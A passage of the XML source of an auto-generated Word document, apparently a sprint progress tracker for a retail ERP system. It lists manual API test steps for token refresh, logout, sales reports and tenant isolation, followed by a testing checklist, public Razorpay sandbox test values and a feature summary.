    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Response should confirm new quantity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. GET /api/v1/stocks — verify quantity increased by 10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   5. ✅ PASS if adjustment reflected in stock level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Sales Reports API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm sales report returns daily breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-7A: Sales Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. GET /api/v1/reports/sales (defaults to last 30 days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should include: from, to, totalBills, totalRevenue, totalTax, totalDiscount, daily (array).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Each daily entry has: date, billCount, revenue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if sales report structure is correct</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Token Refresh &amp; Logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm refresh token rotation and logout work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-8A: Refresh Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. POST /api/v1/auth/refresh with: {"accessToken": "&lt;expired-or-current-token&gt;", "refreshToken": "&lt;refresh-token-from-login&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should return a NEW access token and NEW refresh token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. The OLD refresh token should no longer work (try using it again — should get 401).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if new token pair issued and old refresh token invalidated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-8B: Logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. POST /api/v1/auth/logout (with valid JWT in Authorize header).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. Response should be 200 with success message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. Try using the refresh token again — should get 401.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if all refresh tokens revoked after logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Tenant Isolation via API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Confirm API respects multi-tenant filters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Test 5-9A: Tenant Scoped Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   1. Login as admin@retailerp.com (tenant Admin) via /api/v1/auth/login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   2. GET /api/v1/items — should return ONLY items belonging to Default Company.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   3. If another company has data, login as that company's user and verify isolated items.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">   4. ✅ PASS if each tenant sees only its own data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Sprint 5 — Testing Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Print this page, test each item, and mark Pass/Fail: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Test ID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Expected Result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5-1A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Swagger UI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Swagger loads with all controllers listed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5-2A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JWT Login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Login returns accessToken + refreshToken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Invalid Login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Wrong password returns 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5-3A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Authorize /me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/me returns profile with companyId and roles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5-3B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 Token → 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Request without JWT returns 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5-4A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Items Pagination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PagedResponse with correct page/totalCount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5-4B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Items Search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Search filters by name/SKU/barcode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5-4C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Items Create/Update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POST 201 + PUT 200 + GET reflects changes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5-4D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Other CRUD Controllers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7 master data controllers CRUD works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5-5A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 Bills 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Bills listed with pagination and filters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5-5B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 Bill Detail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Bill with line items returned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5-6A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Stock Levels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Stock records with item/warehouse names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5-6B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Stock Adjust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Adjustment changes quantity + creates movement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5-7A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Sales Report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Daily breakdown with totals correct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5-8A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Token Refresh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New token pair issued, old refresh revoked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5-8B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Logout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refresh tokens revoked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5-9A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Tenant Isolation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Each tenant sees only its own data via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☐ Pass  ☐ Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Razorpay Test Credentials Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use these test credentials when testing Sprint 2 payment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Credential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 Card Number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4111 1111 1111 1111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Card Expiry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Any future date (e.g., 12/29)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Card CVV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Any 3 digits (e.g., 123)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 UPI ID (Success)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success@razorpay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 UPI ID (Failure)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failure@razorpay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 NetBanking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Select any bank → auto-succeeds in test mode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Razorpay Dashboard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https://dashboard.razorpay.com → Test Mode toggle ON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Cumulative Feature Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Total features implemented as of March 06, 2026: 67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Foundation &amp; CRUD Modules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8 phases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Entities (DB Tables)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29+ (20 ITenantEntity, Company, UserDashboardLayout, BusinessType, RefreshToken)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Controllers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29 (18 MVC + 11 API controllers)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Views (Razor Pages)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84+ (Dashboard + 4 Companies views)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Services (Business Logic)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15 (+JwtTokenService)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API Endpoints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30+ REST endpoints across 11 API controllers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Security Enhancements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 (Sprint 1) + 1 Antiforgery fix + Multi-Tenant Isolation + JWT Bearer Auth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Payment Gateway Integration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 (Razorpay — Sprint 2)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Multi-Tenant Architecture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EF global query filters, auto-stamp, claims-based tenant resolution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Distributed Caching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(StackExchange.Redis) with automatic in-memory fallback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Dashboard Widgets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25 (15 KPI, 5 Charts, 5 Tables)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Business Type Presets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 (Other, Kirana, Supermarket, Hardware, Pharmacy, Fashion, Restaurant, Chain, Franchise)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Chart Types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 (Line, Bar, Doughnut, Pie, Horizontal Bar)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 Libraries (CDN)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Gridstack.js v10.3.1, Chart.js 4.4.1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DB Migrations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Sprint2_Razorpay_Payment_Fields, Sprint3_Dashboard_Widgets, Sprint4_MultiTenant_Redis, Sprint4_TenantScopedUniqueIndexes, Sprint4_1_SuperAdmin_Enhancements, Sprint5_JWT_RefreshTokens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NuGet Packages Added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Serilog.AspNetCore, Serilog.Enrichers.Environment, HealthChecks.SqlServer, Microsoft.Extensions.Caching.StackExchangeRedis, StackExchange.Redis, Microsoft.AspNetCore.Authentication.JwtBearer, Swashbuckle.AspNetCore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Roles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7 (SuperAdmin, Admin, Manager, Cashier, Inventory, Finance, HR)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Authentication Schemes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 (Cookie for MVC views + JWT Bearer for REST API)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API Documentation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Swagger UI at /swagger with JWT security definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>This document is auto-generated. Re-run generate_progress_tracker.py after each sprint.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